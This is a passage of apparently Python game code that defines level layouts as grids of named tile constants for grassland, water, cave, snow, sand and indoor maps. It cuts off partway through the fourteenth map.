[RROCKTWO, BROCK, BROCK, RROCKTWO, GTREE, GTREE, GGRASS, PPATHTHREE, GTREE, GGRASS, GTREE, RROCKTWO, BROCK, BROCK]
]
#Second Map
tilemaptwo = [
[GTREE, BROCK, WWATERTEN, WWATERELEVEN, WWATERELEVEN, WWATERTWELVE, GGRASS, GTREE, RROCKTWO, GTREE, BROCK, GTREE, RROCKTWO, BROCK],
[RROCKTWO, GTREE, GTREE, WWATERTHREE, BWATER, WWATERSIX, GTREE, GGRASS, LLONGGRASS, GGRASS, GGRASS, LLONGGRASS, BROCK, BROCK],
[RROCKTWO, GTREE, GGRASS, WWATEREIGHT, WWATERFOUR, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, BROCK, GGRASS, GGRASS, RROCKTWO],
[GTREE, LLONGGRASS, GGRASS, GGRASS, BBRIDGE, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, RROCKTWO, GTREE],
[RROCKTWO, GGRASS, GGRASS, GGRASS, WWATERTHIRTEEN, GGRASS, GGRASS, GGRASS, GTREE, GGRASS, RROCKTWO, LLONGGRASS, BROCK, GTREE],
[GTREE, LLONGGRASS, GGRASS, WWATERNINE, WWATERFOUR, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE],
[DSTAIR, GGRASS, GGRASS, WWATERTHREE, WWATERFOUR, GGRASS, GTREE, GGRASS, GGRASS, GGRASS, GTREE, GGRASS, GTREE, GGRASS],
[RROCKTWO, GTREE, WWATERNINE, BWATER, WWATERSIX, GGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, BROCK, GGRASS, BROCK],
[BROCK, GTREE, WWATERTHREE, WWATERSIX, GGRASS, GTREE, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, BROCK, LLONGGRASS, GTREE],
[RROCKTWO, WWATERNINE, WWATERFOUR, GTREE, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, BROCK, RROCKTWO],
[WWATERNINE, BWATER, WWATERFOUR, RROCKTWO, GTREE, GTREE, GGRASS, GGRASS, RROCKTWO, BROCK, GTREE, GGRASS, BROCK, BROCK]
]
#Third Map
tilemapthree = [
[GTREE, GTREE, GTREE, RROCKTWO, GTREE, GTREE, GTREE, GTREE, GTREE, RROCKTWO, GTREE, GTREE, BROCK, SSTUMP],
[GTREE, GTREE, BROCK, GTREE, GTREE, LLONGGRASS, GGRASS, GGRASS, LLONGGRASS, LLONGGRASS, GTREE, GTREE, GTREE, GTREE],
[RROCKTWO, GTREE, GTREE, GGRASS, SSTUMP, LLONGGRASS, BROCK, GGRASS, GGRASS, GTREE, GTREE, GTREE, GTREE, GTREE],
[GTREE, GTREE, LLONGGRASS, LLONGGRASS, GGRASS, GGRASS, GTREE, LLONGGRASS, GTREE, LLONGGRASS, GGRASS, BROCK, GTREE, RROCKTWO],
[LLONGGRASS, GTREE, GTREE, SSTUMP, GTREE, GGRASS, LLONGGRASS, RROCKTWO, GGRASS, GGRASS, BROCK, BROCK, RROCKTWO, LLONGGRASS],
[GGRASS, LLONGGRASS, RROCKTWO, GGRASS, RROCKTWO, GGRASS, SSTUMP, GGRASS, GGRASS, LLONGGRASS, GTREE, LLONGGRASS, GGRASS, GGRASS],
[GGRASS, LLONGGRASS, GGRASS, GTREE, BROCK, LLONGGRASS, LLONGGRASS, GGRASS, GGRASS, GTREE, GGRASS, GGRASS, GTREE, GGRASS],
[BROCK, RROCKTWO, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, GGRASS, LLONGGRASS, GTREE, GTREE, GTREE],
[GTREE, GTREE, GGRASS, LLONGGRASS, GGRASS, RROCKTWO, GGRASS, BROCK, LLONGGRASS, GGRASS, GGRASS, SSTUMP, GTREE, BROCK],
[SSTUMP, GTREE, GTREE, GGRASS, RROCKTWO, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, GTREE, GTREE, GTREE],
[GTREE, SSTUMP, GTREE, GTREE, GTREE, GTREE, GTREE, BROCK, BROCK, GTREE, GTREE, RROCKTWO, GTREE, GTREE]
]
#Fourth Map
tilemapfour = [
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, CCAVEWALLTWO, CCAVEWALL, CCAVEWALLTWO, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, DDARKLEFT, DDARKTILE, DDARKTILE, DDARKTILE],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEROCKTWO, CCAVEFLOOR, CCAVEFLOOR, DDARKLEFT, DDARKTILE, DDARKTILE, DDARKTILE],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, DDARKLEFT, DDARKTILE, DDARKTILE, DDARKTILE],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, CCAVEWALLTWO, CCAVEWALL, CCAVEWALLTWO, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEWALL, CCAVEWALL, CCAVEWALLTWO, CCAVEWALL],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEROCKTWO, CCAVEFLOOR, CCAVEROCK, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVESTAIR],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEFLOOR, CCAVEROCK, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEROCK, CCAVEFLOOR, CCAVEROCK],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE],
[DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE]
]
#Fifth Map
tilemapfive = [
[SSNOWTREE, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE],
[SSNOW, SSNOWTHREE, SSNOW, SSNOWTREE, SSNOW, SSNOWTRUNK, SSNOWTREE, SSNOW, SSNOW, SSNOWTREE, SSNOW, SSNOWTREE, SSNOW, SSNOW],
[SSNOW, SSNOWROCK, SSNOW, SSNOWTREE, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTRUNK, SSNOWTHREE, SSNOWTRUNK, SSNOW, SSNOW, SSNOW],
[SSNOW, SSNOW, SSNOWTRUNK, SSNOW, SSNOW, SSNOWTWO, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW],
[SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOWTHREE],
[SSNOWTWO, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW],
[SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW],
[SSNOW, SSNOW, SSNOWTHREE, SSNOWROCK, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW],
[SSNOWTRUNK, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTRUNK, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTRUNK, SSNOWTRUNK, SSNOWTWO, SSNOW],
[SSNOWTHREE, SSNOWTRUNK, SSNOWROCK, SSNOWTRUNK, SSNOWTWO, SSNOWTREE, SSNOW, SSNOWTRUNK, SSNOW, SSNOWROCK, SSNOWROCK, SSNOW, SSNOW, SSNOWTHREE],
[SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOW, SSNOWTREE, SSNOWTREE, SSNOWROCK]
]
#Sixth Map
tilemapsix = [
[SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSANDROCKS, SSANDROCKS, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSANDROCKS, SSAND, SSANDSHROOMTHREE, SSANDSHROOMTWO, SSANDSHROOMONE, SSAND, SSANDSHROOMTHREE],
[SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND],
[SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSANDROCKS, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSANDROCKS, SSAND, SSANDROCKS, SSAND],
[SSAND, SSAND, SSANDSHROOMONE, SSANDROCKS, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTHREE],
[SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND],
[SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND]
]
#Seventh Map
tilemapseven = [
[SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE],
[SSNOWTRUNK, SSNOW, SSNOWROCK, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOWROCK, SSNOWROCK, SSNOWROCK, SSNOWTWO, SSNOW, SSNOW, SSNOWTRUNK],
[SSNOW, SSNOWTRUNK, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTRUNK, SSNOW],
[SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOWTRUNK, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW],
[SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW],
[SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOWTWO, SSNOW],
[SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE],
[SSNOW, SSNOWROCK, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW],
[SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOWTRUNK, SSNOW, SSNOWTWO, SSNOWTHREE, SSNOW, SSNOW, SSNOWTHREE, SSNOW],
[SSNOWTRUNK, SSNOWTREE, SSNOW, SSNOW, SSNOW, SSNOWROCK, SSNOW, SSNOW, SSNOWROCK, SSNOWROCK, SSNOW, SSNOW, SSNOW, SSNOW],
[SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOW, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK]
]
#Eighth Map
tilemapeight = [
[SSNOW, SSNOWTWO, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO, SSNOW],
[SSNOWTWO, SSNOW, SSNOWTHREE, SSNOW, SSNOWTWO, SSNOWTWO, SSNOW, SSNOWTWO, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO],
[SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTHREE],
[SSNOW, SSNOWTHREE, SSNOWTWO, SSNOW, SSNOW, SSNOWFOUR, SSNOWFOUR, SSNOWFOUR, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW],
[SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWFOUR, SSNOW, SSNOW, SSNOWFOUR, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW],
[SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOWFOUR, SSNOWFOUR, SSNOW, SSNOWFOUR, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW],
[SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWFOUR, SSNOW, SSNOWTWO, SSNOW, SSNOW],
[SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWFOUR, SSNOWTWO, SSNOW, SSNOW, SSNOW],
[SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWFOUR, SSNOWTWO, SSNOWTWO, SSNOW, SSNOW, SSNOWTHREE],
[SSNOWTWO, SSNOWTHREE, SSNOW, SSNOWTWO, SSNOWTWO, SSNOWFOUR, SSNOWFOUR, SSNOWFOUR, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO],
[SSNOW, SSNOWTWO, SSNOWTHREE, SSNOWFOUR, SSNOWFOUR, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO, SSNOW]
]
#Ninth Map
tilemapnine = [
[RROCKTWO, GTREE, BROCK, GTREE, GTREE, RROCKTWO, BROCK, RROCKTWO, GTREE, BROCK, GTREE, GTREE, BROCK, RROCKTWO],
[GTREE, GTREE, BROCK, GTREE, RROCKTWO, LLONGGRASS, GGRASS, GGRASS, GTREE, GGRASS, GTREE, GTREE, GTREE, GTREE],
[BROCK, GTREE, RROCKTWO, LLONGGRASS, GGRASS, LLONGGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, RROCKTWO, BROCK],
[RROCKTWO, GTREE, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, BROCK, GTREE, RROCKTWO],
[LLONGGRASS, GTREE, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, BROCK, BROCK, RROCKTWO, GGRASS],
[GGRASS, GGRASS, LLONGGRASS, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, BROCK, GGRASS],
[GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, GGRASS],
[BROCK, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, GTREE, GTREE],
[RROCKTWO, RROCKTWO, LLONGGRASS, GTREE, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, BROCK, GTREE, GTREE],
[BROCK, GTREE, GTREE, GTREE, RROCKTWO, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, GTREE, GTREE, BROCK, RROCKTWO],
[GTREE, BROCK, GTREE, BROCK, GTREE, GTREE, RROCKTWO, GTREE, BROCK, GTREE, BROCK, GTREE, GTREE, GTREE]
]
#Tenth Map
tilemapten = [
[SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSANDROCKS, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSANDSHROOMONE],
[SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND],
[SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMONE, SSAND, SSANDROCKS, SSAND, SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSAND, SSANDSHROOMTHREE],
[SSAND, SSANDROCKS, SSANDROCKS, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND],
[SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSANDSHROOMONE, SSANDROCKS, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND],
[SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSANDSHROOMTHREE, SSAND, SSANDSHROOMTHREE, SSAND, SSANDSHROOMTHREE, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSANDSHROOMTWO, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSANDSHROOMONE, SSAND, SSANDSHROOMTHREE, SSANDSHROOMTWO, SSANDSHROOMTHREE, SSAND],
[SSANDSHROOMTHREE, SSANDSHROOMTHREE, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND],
[SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSANDROCKS, SSANDSHROOMONE, SSAND, SSANDSHROOMONE, SSAND, SSANDSHROOMONE, SSAND, SSAND],
[SSAND, SSANDROCKS, SSAND, SSAND, SSANDSHROOMTWO, SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSANDSHROOMTHREE]
]
#Eleventh Map
tilemapeleven = [
[SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND],
[SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTHREE, SSANDSHROOMTWO, SSANDSHROOMONE, SSANDSHROOMTWO, SSANDROCKS],
[SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSANDROCKS, SSAND, SSAND],
[SSANDROCKS, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSANDSHROOMTWO, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE],
[SSANDSHROOMTWO, SSAND, SSAND, SSANDROCKS, SSAND, SSANDSHROOMONE, SSANDROCKS, SSANDROCKS, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTWO, SSANDROCKS, SSANDROCKS, SSANDROCKS, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND],
[SSANDROCKS, SSANDSHROOMTHREE, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSANDSHROOMTWO, SSANDSHROOMONE, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMTHREE, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTWO, SSANDROCKS, SSAND, SSANDSHROOMTHREE],
[SSAND, SSANDSHROOMTHREE, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND],
[SSANDSHROOMTWO, SSAND, SSAND, SSANDROCKS, SSANDSHROOMTWO, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND]
]
#Twelfth Map
tilemaptwelve = [
[SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND],
[SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
[SSANDROCKS, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSANDROCKS],
[SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSANDROCKS],
[SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMONE, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSANDSHROOMTHREE],
[SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND],
[SSANDROCKS, SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE],
[SSANDSHROOMTWO, SSAND, SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND],
[SSANDROCKS, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSANDSHROOMONE, SSANDSHROOMTWO, SSANDX, SSAND],
[SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSANDSHROOMONE, SSAND, SSAND, SSANDSHROOMONE, SSANDSHROOMONE],
[SSAND, SSAND, SSAND, SSANDROCKS, SSANDROCKS, SSANDSHROOMTHREE, SSAND, SSANDSHROOMTWO, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND]
]
#Thirteenth Map
tilemapthirteen = [
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLTOPLEFT, WWALLTOP, WWALLTOP, WWALLTOP, WWALLTOP, MMOUNTEDWALL, WWALLTOPRIGHT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, TTABLE, TTABLE, TTABLE, TTABLE, TTABLE, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, CCHAIRTWO, FFLOORBASIC, FFLOORBASIC, CCHAIRONE, CCHAIRONE, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, CCHAIRONE, FFLOORBASIC, CCHAIRONE, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLBOTTOMLEFT, WWALLBOTTOM, WWALLBOTTOM, EEXIT, WWALLBOTTOM, WWALLBOTTOM, WWALLBOTTOMRIGHT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK]
]
#Fourteenth Map
tilemapfourteen = [
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLTOPLEFT, BBOOKWALL, WWALLTOP, WWALLTOP, MMOUNTEDWALL, WWALLTOP, WWALLTOPRIGHT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLRIGHT, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, BBED, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, CCHAIRTWO, CCHAIRONE, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
